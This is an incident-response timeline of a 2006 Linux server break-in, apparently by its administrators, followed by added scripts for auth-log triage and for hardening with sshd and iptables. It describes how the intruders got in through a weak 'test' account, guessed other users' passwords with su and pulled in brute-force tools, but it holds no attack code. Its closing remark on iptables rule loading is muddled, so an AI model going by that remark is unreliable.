runlevel (to lvl 2) Tue Mar 7 09:22 - 09:25 (00:03) 2.4.27-2-386
skycode pts/0 Tue Mar 7 09:23 - down (00:01) 217.136.140.81
runlevel (to lvl 6) Tue Mar 7 09:25 - 09:25 (00:00) 2.4.27-2-386
shutdown system down Tue Mar 7 09:25 - 09:28 (00:02) 2.4.27-2-386
reboot system boot Tue Mar 7 09:28 - 09:44 (00:15) 2.4.27-2-386
runlevel (to lvl 2) Tue Mar 7 09:28 - 09:44 (00:15) 2.4.27-2-386
skycode pts/0 Tue Mar 7 09:34 - down (00:09) 217.136.140.81
runlevel (to lvl 6) Tue Mar 7 09:44 - 09:44 (00:00) 2.4.27-2-386
shutdown system down Tue Mar 7 09:44 - 09:48 (00:04) 2.4.27-2-386
reboot system boot Tue Mar 7 09:48 - 01:03 (12+15:14) 2.4.27-2-386
runlevel (to lvl 2) Tue Mar 7 09:48 - 01:03 (12+15:14) 2.4.27-2-386
2006/03/09 14:57:31 82.79.137.27 *   vsftpd: Thu Mar 9 14:57:31 2006 [pid 5545] [test] OK LOGIN: Client "82.79.137.27"
2006/03/09 14:57:31 82.79.137.26 *   vsftpd: Thu Mar 9 14:57:31 2006 [pid 5541] [test] OK LOGIN: Client "82.79.137.26"
2006/03/09 14:57:31 82.79.137.28 *   vsftpd: Thu Mar 9 14:57:31 2006 [pid 5543] [test] OK LOGIN: Client "82.79.137.28"
2006/03/09 14:57:31 82.79.137.7  *   vsftpd: Thu Mar 9 14:57:31 2006 [pid 5547] [test] OK LOGIN: Client "82.79.137.7"
2006/03/09 14:57:33 82.79.137.28 *   vsftpd: Thu Mar 9 14:57:33 2006 [pid 5561] [test] OK LOGIN: Client "82.79.137.28"
2006/03/09 14:57:33 82.79.137.30 *   vsftpd: Thu Mar 9 14:57:33 2006 [pid 5563] [test] OK LOGIN: Client "82.79.137.30"
2006/03/09 15:01:29 82.79.137.30     30.metronetwork.rdsbz.ro - - [09/Mar/2006:15:01:29 +0100] "GET / HTTP/1.1" 200 1053 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-"
2006/03/09 15:01:30 82.79.137.30     30.metronetwork.rdsbz.ro - - [09/Mar/2006:15:01:30 +0100] "GET /logowhite.png HTTP/1.1" 200 19801 "http://213.186.53.60/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-"
2006/03/09 15:01:34 82.79.137.6      Mar 9 15:01:34 localhost vsftpd: (pam_unix) authentication failure; logname= uid=0 euid=0 tty= ruser= rhost=82.79.137.6
2006/03/09 15:01:36 82.79.137.6      vsftpd: Thu Mar 9 15:01:36 2006 [pid 5944] [anonymous] FAIL LOGIN: Client "82.79.137.6"
2006/03/09 15:01:37 82.79.137.27     Mar 9 15:01:37 localhost vsftpd: (pam_unix) authentication failure; logname= uid=0 euid=0 tty= ruser= rhost=82.79.137.27
2006/03/09 15:01:39 82.79.137.27     vsftpd: Thu Mar 9 15:01:39 2006 [pid 5946] [anonymous] FAIL LOGIN: Client "82.79.137.27"
2006/03/09 15:01:45 82.79.137.18 *   vsftpd: Thu Mar 9 15:01:45 2006 [pid 5963] [test] OK LOGIN: Client "82.79.137.18"
2006/03/09 15:01:47 82.79.137.9  *   vsftpd: Thu Mar 9 15:01:47 2006 [pid 5967] [test] OK LOGIN: Client "82.79.137.9"
2006/03/09 15:02:07 82.79.137.20     20.metronetwork.rdsbz.ro - - [09/Mar/2006:15:02:07 +0100] "GET / HTTP/1.1" 200 1053 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-"
2006/03/09 15:02:08 82.79.137.20     20.metronetwork.rdsbz.ro - - [09/Mar/2006:15:02:08 +0100] "GET /logowhite.png HTTP/1.1" 200 19801 "http://213.186.53.59/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-"
2006/03/09 15:02:35 82.79.137.18     18.metronetwork.rdsbz.ro - - [09/Mar/2006:15:02:35 +0100] "GET / HTTP/1.1" 200 1053 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-"
2006/03/09 15:02:36 82.79.137.18     18.metronetwork.rdsbz.ro - - [09/Mar/2006:15:02:36 +0100] "GET /logowhite.png HTTP/1.1" 200 19801 "http://213.186.53.51/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-"
ratibus pts/2 82.233.38.20 Thu Mar 16 23:13 - 23:14 (00:00)
2006/03/17 00:12:32 193.230.222.209 *   Mar 17 00:12:32 localhost sshd[30299]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3741 ssh2
2006/03/17 00:12:32 193.230.222.209 *   Mar 17 00:12:32 localhost sshd[30318]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 00:12    193.230.222.209 *   test pts/2 193.230.222.209 Fri Mar 17 00:12 - 00:30 (00:18)
2006/03/17 00:12:45 193.230.222.209 *!! Mar 17 00:12:45 localhost passwd[30326]: (pam_unix) password changed for test
2006/03/17 00:12:45 193.230.222.209 *!! Mar 17 00:12:45 localhost passwd[30326]: (pam_unix) Password for test was changed
2006/03/17 00:15:35 193.230.222.209 *   Mar 17 00:15:35 localhost sshd[30439]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3744 ssh2
2006/03/17 00:15:35 193.230.222.209 *   Mar 17 00:15:35 localhost sshd[30454]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 00:15    193.230.222.209 *   test pts/3 193.230.222.209 Fri Mar 17 00:15 - 00:15 (00:00)
2006/03/17 00:15:52 193.230.222.209 *   Mar 17 00:15:52 localhost sshd[30454]: (pam_unix) session closed for user test
2006/03/17 00:17:28 193.230.222.209 *.  Mar 17 00:17:28 localhost su[30537]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost= user=vinoj
2006/03/17 00:17:30 193.230.222.209 *.  Mar 17 00:17:30 localhost su[30537]: pam_authenticate: Authentication failure
2006/03/17 00:17:30 193.230.222.209 *.  Mar 17 00:17:30 localhost su[30537]: - pts/2 test:vinoj
2006/03/17 00:17:36 193.230.222.209 *.  Mar 17 00:17:36 localhost su[30547]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost= user=vinoj
2006/03/17 00:17:38 193.230.222.209 *.  Mar 17 00:17:38 localhost su[30547]: pam_authenticate: Authentication failure
2006/03/17 00:17:38 193.230.222.209 *.  Mar 17 00:17:38 localhost su[30547]: - pts/2 test:vinoj
2006/03/17 00:18:42 193.230.222.209 .*  Mar 17 00:18:42 localhost sshd[30594]: (pam_unix) authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=209-nat.s-man.net user=croulants
2006/03/17 00:18:45 193.230.222.209 .*  Mar 17 00:18:45 localhost sshd[30591]: error: PAM: Authentication failure for croulants from 209-nat.s-man.net
2006/03/17 00:18:51 193.230.222.209 .*  Mar 17 00:18:51 localhost sshd[30591]: error: PAM: Authentication failure for croulants from 209-nat.s-man.net
2006/03/17 00:18:59 193.230.222.209 .*  Mar 17 00:18:59 localhost sshd[30591]: error: PAM: Have exhasted maximum number of retries for service. for croulants from 209-nat.s-man.net
2006/03/17 00:19:10 193.230.222.209 .*  Mar 17 00:19:10 localhost sshd[30591]: error: PAM: Have exhasted maximum number of retries for service. for croulants from 209-nat.s-man.net
2006/03/17 00:19:10 193.230.222.209 .*  Mar 17 00:19:10 localhost sshd[30591]: Failed keyboard-interactive/pam for croulants from 193.230.222.209 port 3753 ssh2
2006/03/17 00:19:50 193.230.222.209 *.  Mar 17 00:19:50 localhost su[30638]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost= user=trollingsecours
2006/03/17 00:19:52 193.230.222.209 *.  Mar 17 00:19:52 localhost su[30638]: pam_authenticate: Authentication failure
2006/03/17 00:19:52 193.230.222.209 *.  Mar 17 00:19:52 localhost su[30638]: - pts/2 test:trollingsecours
2006/03/17 00:19:57 193.230.222.209 *.  Mar 17 00:19:57 localhost su[30643]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost= user=trollingsecours
2006/03/17 00:19:59 193.230.222.209 *.  Mar 17 00:19:59 localhost su[30643]: pam_authenticate: Authentication failure
2006/03/17 00:19:59 193.230.222.209 *.  Mar 17 00:19:59 localhost su[30643]: - pts/2 test:trollingsecours
2006/03/17 00:20:04 193.230.222.209 *.  Mar 17 00:20:04 localhost su[30644]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost= user=trollingsecours
2006/03/17 00:20:06 193.230.222.209 *.  Mar 17 00:20:06 localhost su[30644]: pam_authenticate: Authentication failure
2006/03/17 00:20:06 193.230.222.209 *.  Mar 17 00:20:06 localhost su[30644]: - pts/2 test:trollingsecours
2006/03/17 00:26:26 193.230.222.253     193.230.222.253 - - [17/Mar/2006:00:26:26 +0100] "GET / HTTP/1.0" 200 1053 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "-"
2006/03/17 00:26:27 193.230.222.253     193.230.222.253 - - [17/Mar/2006:00:26:27 +0100] "GET /logowhite.png HTTP/1.0" 200 19801 "http://213.186.53.59/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "-"
2006/03/17 00:26:28 193.230.222.253     193.230.222.253 - - [17/Mar/2006:00:26:28 +0100] "GET /favicon.ico HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "-"
2006/03/17 00:28:33 193.230.222.209 *   Mar 17 00:28:33 localhost sshd[31078]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3788 ssh2
2006/03/17 00:28:33 193.230.222.209 *   Mar 17 00:28:33 localhost sshd[31107]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 00:28    193.230.222.209 *   test pts/4 193.230.222.209 Fri Mar 17 00:28 - 00:30 (00:01)
2006/03/17 00:28:40 193.230.222.209 *!  Mar 17 06 00:28:40 0 ..c crw--w---- test tty /dev/pts/5
2006/03/17 00:29:02 193.230.222.209 *!  Mar 17 06 00:29:02 0 .a. crw--w---- test tty /dev/pts/5
2006/03/17 00:30:31 193.230.222.209 *   Mar 17 00:30:31 localhost sshd[31107]: (pam_unix) session closed for user test
2006/03/17 00:30:33 193.230.222.209 *   Mar 17 00:30:33 localhost sshd[30318]: (pam_unix) session closed for user test
Mar 17 06 06:35:02 0 m.c prw-r----- root adm /dev/xconsole
2006/03/17 09:00:52 193.230.222.209 *   Mar 17 09:00:52 localhost sshd[25229]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3050 ssh2
2006/03/17 09:00:52 193.230.222.209 *   Mar 17 09:00:52 localhost sshd[25263]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 09:00    193.230.222.209 *   test pts/4 193.230.222.209 Fri Mar 17 09:00 - 09:38 (00:37)
2006/03/17 09:03:43 193.230.222.209 *!  Mar 17 06 09:03:43 0 ..c crw--w---- test tty /dev/pts/6
2006/03/17 09:03:58 193.230.222.209 *!  Mar 17 06 09:03:58 0 .a. crw--w---- test tty /dev/pts/6
(pts/5 at 00:28 and pts/6 at 09:03 are the ptys of the two screen sessions, PIDs 31116 and 25680, seen in the ps listing above; the sessions outlive the ssh logins that created them)
2006/03/17 09:38:33 193.230.222.209 *   Mar 17 09:38:33 localhost sshd[25263]: (pam_unix) session closed for user test
2006/03/17 12:19:43 193.230.222.209 *   Mar 17 12:19:43 localhost sshd[14815]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3222 ssh2
2006/03/17 12:19:43 193.230.222.209 *   Mar 17 12:19:43 localhost sshd[14834]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 12:19    193.230.222.209 *   test pts/3 193.230.222.209 Fri Mar 17 12:19 - 14:25 (02:05)
2006/03/17 12:26:01 193.230.222.209 *   Mar 17 12:26:01 localhost sshd[15484]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3338 ssh2
2006/03/17 12:26:01 193.230.222.209 *   Mar 17 12:26:01 localhost sshd[15511]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 12:26    193.230.222.209 *   test pts/4 193.230.222.209 Fri Mar 17 12:26 - 14:30 (02:04)
2006/03/17 12:32:44 193.230.222.209 *   Mar 17 12:32:44 localhost sshd[16030]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3353 ssh2
2006/03/17 12:32:44 193.230.222.209 *   Mar 17 12:32:44 localhost sshd[16037]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 12:32    193.230.222.209 *   test pts/7 193.230.222.209 Fri Mar 17 12:32 - 16:26 (03:53)
2006/03/17 14:25:38 193.230.222.209 *   Mar 17 14:25:38 localhost sshd[14834]: (pam_unix) session closed for user test
2006/03/17 14:30:58 193.230.222.209 *   Mar 17 14:30:58 localhost sshd[15511]: (pam_unix) session closed for user test
2006/03/17 14:36:43 193.230.222.209 *   Mar 17 14:36:43 localhost sshd[585]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3934 ssh2
2006/03/17 14:36:43 193.230.222.209 *   Mar 17 14:36:43 localhost sshd[671]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 14:36    193.230.222.209 *   test pts/3 193.230.222.209 Fri Mar 17 14:36 - 16:49 (02:12)
2006/03/17 14:59:56 193.230.222.209 *   Mar 17 14:59:56 localhost sshd[5706]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 4025 ssh2
2006/03/17 14:59:56 193.230.222.209 *   Mar 17 14:59:56 localhost sshd[5714]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 15:00    193.230.222.209 *   test pts/4 193.230.222.209 Fri Mar 17 15:00 - 17:12 (02:12)
2006/03/17 15:03:26 193.230.222.209 *   Mar 17 15:03:26 localhost sshd[6092]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 4027 ssh2
2006/03/17 15:03:26 193.230.222.209 *   Mar 17 15:03:26 localhost sshd[6171]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 15:03    193.230.222.209 *   test pts/8 193.230.222.209 Fri Mar 17 15:03 - 15:14 (00:10)
2006/03/17 15:14:06 193.230.222.209 *   Mar 17 15:14:06 localhost sshd[6171]: (pam_unix) session closed for user test
2006/03/17 16:26:40 193.230.222.209 *   Mar 17 16:26:40 localhost sshd[16037]: (pam_unix) session closed for user test
2006/03/17 16:49:15 193.230.222.209 *   Mar 17 16:49:15 localhost sshd[671]: (pam_unix) session closed for user test
2006/03/17 17:12:46 193.230.222.209 *   Mar 17 17:12:46 localhost sshd[5714]: (pam_unix) session closed for user test
2006/03/17
17:18 # ## First mails blocked... no contact outside is possible via the default IP source Mar 17 19:30:39 localhost sshd[1425]: Accepted keyboard-interactive/pam for skycode from 213.49.238.76 port 1087 ssh2 skycode pts/3 213.49.238.76 Fri Mar 17 19:30 still logged in Mar 17 06 19:30:39 0 ..c crw--w---- skycode tty /dev/pts/3 Mar 17 19:30:50 localhost sudo: skycode : TTY=pts/3 ; PWD=/home/skycode ; USER=root ; COMMAND=/bin/bash Mar 17 19:33:45 localhost sshd[2170]: Accepted keyboard-interactive/pam for skycode from 213.49.238.76 port 1089 ssh2 skycode pts/4 213.49.238.76 Fri Mar 17 19:33 still logged in Mar 17 06 19:33:45 0 ..c crw--w---- skycode tty /dev/pts/4 Mar 17 19:34:41 localhost sudo: skycode : TTY=pts/4 ; PWD=/home ; USER=root ; COMMAND=/bin/bash 2006/03/17 19:37:19 ! Mar 17 19:37:19 localhost su[2642]: + pts/4 root:test Mar 17 06 19:38:16 0 ..c crw--w---- root tty /dev/pts/7 2006/03/17 19:39:21 !! Mar 17 06 19:39:21 2467 m.c -rw-r----- root shadow /etc/shadow = test:$ passwd? 2006/03/17 19:39:21 !! Mar 17 19:39:21 localhost passwd[2713]: (pam_unix) password changed for test 2006/03/17 19:39:21 !! Mar 17 19:39:21 localhost passwd[2713]: (pam_unix) Password for test was changed 2006/03/17 19:40:12 ! Mar 17 19:40:12 localhost su[2763]: + pts/3 root:test 2006/03/17 19:40:19 ! Mar 17 06 19:40:19 4096 m.. drwxr-xr-x test test /home/test 2006/03/17 19:40:19 ! 4096 m.. drwx------ test test /home/test/.mc/cedit = test:$ mc? 2006/03/17 19:40:25 ! Mar 17 06 19:40:25 0 m.. -rw-r--r-- test test /home/test/.mc/history but test not loggued normally 2006/03/17 19:40:25 ! 35 m.. -rw-r--r-- test test /home/test/.mc/Tree or via ./go?? 2006/03/17 19:40:25 ! 4096 m.. drwxr-xr-x test test /home/test/.mc 2006/03/17 19:40:25 ! 32 m.. -rw-r--r-- test test /home/test/.mc/filepos => /tmp/crontab.Hq7als/crontab 1;0 => correspond to crontab -e in .bash_history?... 2006/03/17 19:40:25 ! 1945 m.. -rw-r--r-- test test /home/test/.mc/ini 2006/03/17 19:40:31 ! Mar 17 06 19:40:31 2117 m.. 
-rw------- test test /home/test/.bash_history phil pts/8 85.234.194.12 Fri Mar 17 20:08 - 20:19 (00:11) phil pts/8 85.234.194.12 Fri Mar 17 20:20 still logged in phil pts/14 85.234.194.12 Fri Mar 17 21:14 still logged in skycode pts/15 213.49.238.76 Fri Mar 17 21:39 still logged in Mar 17 06 21:05:08 0 m.. crw--w---- root tty /dev/pts/12 0 m.. crw------- phil tty /dev/pts/8 Mar 17 06 21:05:09 0 m.. crw--w---- test tty /dev/pts/5 Mar 17 06 21:05:10 0 ma. crw-rw-rw- root tty /dev/ptmx 0 m.. crw--w---- test tty /dev/pts/6 0 .a. crw------- phil tty /dev/pts/8 0 .a. crw-rw-rw- root tty /dev/tty 2006/03/17 21:10:59 # user.log: Mar 17 21:10:59 localhost rpc.mountd: export request from 127.0.0.1 2006/03/17 21:10:59 # user.log: Mar 17 21:10:59 localhost rpc.mountd: dump request from 127.0.0.1 2006/03/17 21:28:56 # Mar 17 21:28:56 localhost -- MARK -- 2006/03/17 21:30:03 # last occurence of 20060317 213003 start /sbin/modprobe -s -k -- net-pf-10 safemode=0 2006/03/17 21:30:03 # last occurence of 20060317 213003 probe ended 2006/03/17 21:45:04 # Mar 17 21:45:04 localhost snmpd[1467]: Connection from 127.0.0.1 2006/03/17 21:45:04 # Mar 17 21:45:04 localhost last message repeated 3 times 2006/03/17 21:48:56 # ## No MARK at 21:48:56 2006/03/17 21:50:05 # Mar 17 21:50:05 localhost snmpd[1467]: Connection from 127.0.0.1 2006/03/17 21:55 # ## No snmp at 21:55 TODO: ===== ftp repository of test?? /var/cache/tct
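The syslog part of the timeline above (sshd, su, sudo and passwd lines) can be triaged mechanically rather than read line by line. The following POSIX sh + awk script is an added example, not part of the original analysis: it counts PAM authentication failures per service and target user (which separates the ssh guessing against 'croulants' from the su guessing against 'trollingsecours'), lists su attempts with their outcome, lists accepted ssh logins with their source, and lists sudo commands and password changes. The embedded excerpt is copied from the timeline above so the script runs offline; only awk, sort and grep are assumed.

```shell
#!/bin/sh
# Added example (not part of the original page): auth-log triage in sh + awk.
# SAMPLE_AUTH_LOG is an excerpt copied from the incident timeline and embedded
# here so that the functions can be exercised without the original log files.

SAMPLE_AUTH_LOG=$(cat <<'EOF'
Mar 17 00:18:42 localhost sshd[30594]: (pam_unix) authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=209-nat.s-man.net user=croulants
Mar 17 00:18:59 localhost sshd[30591]: error: PAM: Have exhasted maximum number of retries for service. for croulants from 209-nat.s-man.net
Mar 17 00:19:10 localhost sshd[30591]: Failed keyboard-interactive/pam for croulants from 193.230.222.209 port 3753 ssh2
Mar 17 00:19:50 localhost su[30638]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost= user=trollingsecours
Mar 17 00:19:52 localhost su[30638]: - pts/2 test:trollingsecours
Mar 17 00:19:57 localhost su[30643]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost= user=trollingsecours
Mar 17 00:19:59 localhost su[30643]: - pts/2 test:trollingsecours
Mar 17 00:20:04 localhost su[30644]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost= user=trollingsecours
Mar 17 00:20:06 localhost su[30644]: - pts/2 test:trollingsecours
Mar 17 00:28:33 localhost sshd[31078]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3788 ssh2
Mar 17 19:30:39 localhost sshd[1425]: Accepted keyboard-interactive/pam for skycode from 213.49.238.76 port 1087 ssh2
Mar 17 19:30:50 localhost sudo: skycode : TTY=pts/3 ; PWD=/home/skycode ; USER=root ; COMMAND=/bin/bash
Mar 17 19:37:19 localhost su[2642]: + pts/4 root:test
Mar 17 19:39:21 localhost passwd[2713]: (pam_unix) password changed for test
EOF
)

# PAM "(pam_unix) authentication failure" events counted per service and
# target user. Output: "<service> <user> <count>", sorted. Field 5 is the
# "prog[pid]:" token; "ruser=" is deliberately skipped by anchoring on ^user=.
pam_failures() {
    printf '%s\n' "$1" | awk '/\(pam_unix\) authentication failure/ {
        svc = $5; sub(/\[.*/, "", svc)
        for (i = 6; i <= NF; i++) if ($i ~ /^user=/) u = substr($i, 6)
        n[svc " " u]++
    }
    END { for (k in n) print k, n[k] }' | sort
}

# su attempts as logged by su itself: "+" means success, "-" failure.
# Output: "<ok|fail> <from-user> <to-user> <tty>".
su_events() {
    printf '%s\n' "$1" | awk '$5 ~ /^su\[/ && ($6 == "+" || $6 == "-") {
        split($8, p, ":")
        s = ($6 == "+") ? "ok" : "fail"
        print s, p[1], p[2], $7
    }'
}

# Accepted ssh logins. Output: "<user> <source-ip>".
ssh_accepted() {
    printf '%s\n' "$1" | awk '$5 ~ /^sshd\[/ && $6 == "Accepted" {
        for (i = 7; i <= NF; i++) { if ($i == "for") u = $(i + 1); if ($i == "from") h = $(i + 1) }
        print u, h
    }'
}

# Privilege-related changes: sudo commands and password changes.
# Output: "sudo <user> <command>" or "passwd <user>".
privilege_changes() {
    printf '%s\n' "$1" | awk '
        $5 == "sudo:" { for (i = 7; i <= NF; i++) if ($i ~ /^COMMAND=/) print "sudo", $6, substr($i, 9) }
        $5 ~ /^passwd\[/ && /password changed for/ { print "passwd", $NF }'
}

# Number of times sshd reported that PAM ran out of retries (the server-side
# sign of a password-guessing run; the log line carries its own misspelling).
retry_limit_hits() {
    printf '%s\n' "$1" | grep -c 'maximum number of retries' || true
}

triage_summary() {
    echo "== PAM failures (service user count) =="; pam_failures "$1"
    echo "== su attempts =="; su_events "$1"
    echo "== accepted ssh logins =="; ssh_accepted "$1"
    echo "== privilege changes =="; privilege_changes "$1"
    echo "== PAM retry limit hit =="; retry_limit_hits "$1"
}

triage_summary "$SAMPLE_AUTH_LOG"
```

On a real host the same functions take `"$(cat /var/log/auth.log)"` as their argument; the value of the per-service split is that a burst of su failures from an already logged-in low-privilege account (here 'test' trying to become 'trollingsecours') is a different finding from remote ssh guessing and would be missed by a scan of sshd lines alone.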
Conclusions
- Initial breach
  - an automatic tool scanning ftp accounts could enter with the 'test' account
  - manual attempt to log in with the 'test' account
  - download of sniffers and brute-force tools for ssh
  - transfers over ftp
  - change of the 'test' password
  - 82.79.137.NN = NN.metronetwork.rdsbz.ro
  - 193.230.222.209 = 209-nat.s-man.net
- Counter-measures
  - don't use dummy passwords ;-)
  - don't grant ftp/ssh rights by default
    - sshd: make use of the "AllowUsers" keyword and explicitly add users when needed
  - don't grant internet access by default
    - iptables: cf. --uid-owner and the other --XXX-owner options
      - on the OUTPUT chain to avoid downloads of malicious code
      - on the INPUT chain to avoid bindshells
- Timeline
  - Before and during the live forensic analysis we should have written down our own actions and the observable elements rather than having to deduce them from the logs.
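The two technical counter-measures above (an sshd "AllowUsers" allow-list and iptables owner-based egress filtering) are shown below as an added example, not as configuration from the incident or from the team that wrote this page. The script stages the files in a scratch directory so it can run unprivileged, and carries small checks a defender can reuse to confirm that an unwanted account is absent from AllowUsers and that both chains default to DROP. The admin names (phil, skycode), the 192.0.2.0/24 management network and the uid list are placeholders; an OpenSSH with an `Include /etc/ssh/sshd_config.d/*.conf` line is assumed (older versions need the directive in sshd_config itself). One caveat on the INPUT bullet: the iptables owner match is only valid in the OUTPUT and POSTROUTING chains, so bindshells are kept unreachable with a DROP policy plus an explicit allow-list rather than with --uid-owner.

```shell
#!/bin/sh
# Added example (not from the original page): generate and sanity-check an
# sshd AllowUsers drop-in and a per-uid egress firewall. Everything is written
# under a staging directory; admin names, the 192.0.2.0/24 management network
# and the uid list are placeholders.

# Write an sshd_config drop-in that only lets the listed accounts authenticate.
# Usage: write_sshd_hardening STAGEDIR user1 [user2 ...]
write_sshd_hardening() {
    dir=$1; shift
    mkdir -p "$dir/sshd_config.d"
    {
        echo "# Only explicitly listed accounts may authenticate (OpenSSH AllowUsers)."
        echo "AllowUsers $*"
        echo "PermitRootLogin no"
    } > "$dir/sshd_config.d/10-allowusers.conf"
}

# Return 0 if USER appears in the AllowUsers directive of FILE, 1 otherwise.
# Usage: check_allowusers FILE USER
check_allowusers() {
    awk -v u="$2" '$1 == "AllowUsers" { for (i = 2; i <= NF; i++) if ($i == u) ok = 1 }
                   END { exit ok ? 0 : 1 }' "$1"
}

# Write an iptables-restore file for the filter table: INPUT defaults to DROP
# (so a bindshell bound by a compromised account is unreachable) and only ssh
# from the management network is accepted; OUTPUT defaults to DROP and egress
# is granted per uid with the owner match, so a shell account cannot fetch
# tools from the internet unless its uid is listed.
# Usage: write_owner_firewall STAGEDIR MGMT_CIDR uid1 [uid2 ...]
write_owner_firewall() {
    dir=$1; mgmt=$2; shift 2
    {
        echo "*filter"
        echo ":INPUT DROP [0:0]"
        echo ":FORWARD DROP [0:0]"
        echo ":OUTPUT DROP [0:0]"
        echo "-A INPUT -i lo -j ACCEPT"
        echo "-A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT"
        echo "-A INPUT -p tcp --dport 22 -s $mgmt -j ACCEPT"
        echo "-A OUTPUT -o lo -j ACCEPT"
        echo "-A OUTPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT"
        for u in "$@"; do
            echo "-A OUTPUT -m owner --uid-owner $u -j ACCEPT"
        done
        echo "-A OUTPUT -j LOG --log-prefix \"egress-denied: \""
        echo "COMMIT"
    } > "$dir/iptables.rules"
}

# Return 0 if FILE sets DROP as the default policy for both INPUT and OUTPUT.
firewall_default_deny() {
    grep -qx ':INPUT DROP \[0:0\]' "$1" && grep -qx ':OUTPUT DROP \[0:0\]' "$1"
}

# Return 0 if FILE grants egress to UID through the owner match.
# Usage: firewall_permits_uid FILE UID
firewall_permits_uid() {
    grep -qxF -- "-A OUTPUT -m owner --uid-owner $2 -j ACCEPT" "$1"
}

# Stand-alone demonstration with placeholder values.
STAGE=$(mktemp -d)
write_sshd_hardening "$STAGE" phil skycode
write_owner_firewall "$STAGE" 192.0.2.0/24 root named
if check_allowusers "$STAGE/sshd_config.d/10-allowusers.conf" test; then
    echo "WARNING: 'test' may still log in over ssh"
else
    echo "ok: 'test' is not in AllowUsers"
fi
firewall_default_deny "$STAGE/iptables.rules" && echo "ok: INPUT and OUTPUT default to DROP"
cat "$STAGE/sshd_config.d/10-allowusers.conf" "$STAGE/iptables.rules"
```

To deploy, copy the drop-in under /etc/ssh/sshd_config.d/, run `sshd -t` before reloading sshd (a syntax error in AllowUsers would otherwise lock everyone out), and load the rules with `iptables-restore < iptables.rules` from a console session rather than over ssh, since the OUTPUT policy takes effect before the ESTABLISHED rule is evaluated only if the rules load in one atomic restore.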